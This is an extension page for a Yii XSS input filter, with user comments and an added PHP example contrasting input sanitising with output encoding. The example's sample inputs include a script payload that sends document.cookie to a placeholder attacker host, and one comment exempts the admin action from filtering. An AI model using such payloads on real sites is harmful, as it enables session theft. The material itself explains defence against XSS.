yxss-filter

Use Kohana regexp to sanitize all user input

This extension sanitizes all user input by running it through the Kohana XSS-cleaning regular expressions before your controller actions see it.

Resources

Documentation

Requirements

* Yii 1.0 or above

Installation

* Extract the release file under protected/filters

Usage

Add the following code to your controller.

    public function filters()
    {
        return array(
            array(
                'application.filters.YXssFilter',
                'clean'   => '*',
                'tags'    => 'strict',
                'actions' => 'all'
            )
        );
    }

Change Log

September 10, 2009

  • Initial release.

Total 5 comments

#4240
drumaddict at 2011/06/19 07:21am
<?php ?> tags NOT removed.

The extension is great and all, but in the section just below the // Remove really unwanted tags comment, why are

<?php ?>

tags not removed? I tested and inserted PHP tags in a field, and they were not cleaned...

#4029
jeremy at 2011/05/30 03:45pm
problem using < comparison operator in filters and searches

I still like this extension very much. But if one filters all input types (GET, POST, etc.) and all actions, then comparison operations beginning with < do not work. In STRICT mode, PHP strip_tags treats anything starting with < as a tag, and strips to the next whitespace. In SOFT mode, < is changed into &lt; which does not match the regex in CDbCriteria.compare().

My solution was to add logic to preFilter(), to not filter data coming from the 'Admin' action:

if ($this->actions != '*' && $this->actions != 'ALL'
    && !in_array($filterChain->action->id, explode(',', $this->actions)))
{
    return true;
}

// + JJD
if (strtolower($filterChain->action->id) == 'admin')
{
    return true;
}

This seems like an acceptable compromise to allow use of comparison operators in filters, and still keeps security in the rest of the app.
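The comparison-operator problem described in this comment is a general property of sanitizing at the input layer: strip_tags() (the STRICT behaviour) truncates the value, and entity-encoding it (the SOFT behaviour) stores a string that CDbCriteria::compare() no longer recognises, so either way the data is altered before the query layer sees it. The added example below is not part of YXssFilter or of the commenter's code; it uses only PHP built-ins (strip_tags, htmlspecialchars) to show the two failure modes on constructed sample strings, and contrasts them with leaving the value untouched and escaping it only when it is emitted into HTML. The function and variable names are the example's own. Note also that exempting the 'admin' action removes the filter's protection from that action entirely, so its views must encode every echoed value themselves (in Yii 1.x, CHtml::encode() wraps htmlspecialchars() for this purpose).

```php
<?php
// Added example: not part of the YXssFilter extension or the comment above.
// Shows why a blanket input filter breaks legitimate "<" comparisons and
// how encoding at output time avoids the problem. PHP built-ins only.

// Constructed sample inputs: a legitimate search comparison, a reflected
// XSS payload, and a value with characters that matter inside attributes.
function sampleInputs()
{
    return array(
        'price <100 and qty >5',
        '<script>new Image().src="http://evil.example/?c="+document.cookie</script>',
        'Tom & Jerry "quoted" value',
    );
}

// STRICT-style input filtering: strip_tags() treats "<" as the start of a
// tag and drops everything up to the next ">", so the comparison operator
// and whatever follows it never reach CDbCriteria::compare().
function stripOnInput($value)
{
    return strip_tags($value);
}

// HTML escaping. The same call is wrong at input time (the stored value
// becomes "price &lt;100", which compare() does not recognise) and right
// at output time (the database sees the raw value, the browser sees the
// escaped one). ENT_QUOTES covers both quote styles, so one function is
// safe for a text node and for a double- or single-quoted attribute.
function htmlEncode($value)
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Output-time encoding: the raw search term goes to the query layer as-is
// and is escaped only where it is rendered back into HTML.
function renderSearchResult($rawTerm)
{
    $safe = htmlEncode($rawTerm);
    return '<input name="q" value="' . $safe . '"> matched: ' . $safe;
}

foreach (sampleInputs() as $raw) {
    echo "raw:            $raw\n";
    echo "strip_tags:     " . stripOnInput($raw) . "\n";   // STRICT: truncated
    echo "encoded input:  " . htmlEncode($raw) . "\n";     // SOFT: altered
    echo "rendered:       " . renderSearchResult($raw) . "\n\n";
}
```

Run it with `php example.php` and compare the three lines for the first input: the raw string is what the query layer needs, and only the rendered line needs escaping. The payload in the second input is neutralised by renderSearchResult() without any input filtering at all, which is why output encoding, not an input blacklist, is the primary defence against reflected and stored XSS.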

#3224
jeremy at 2011/03/26 04:43pm
VERY helpful

I put this in my base-controller class from which all other controllers extend. Simple. Now my entire app is protected. From reading the docs for CHtmlPurifier, which does the same thing, it appeared that component performs poorly. So far haven't noticed any performance impact using YXssFilter.

#950
someone at 2010/01/22 02:35am
Thanks!

Thanks a lot for this filter! It's very useful. "must have"

#1316
Bethrezen at 2009/09/16 10:40am
Great work!

Great work, Andrew!


Downloads
  • License: New BSD License
  • Developed by: xomaa
  • Category: Security
  • Votes: +4 / -1
  • Downloaded: 713 times
  • Created on: Sep 10, 2009
  • Last updated: Sep 10, 2009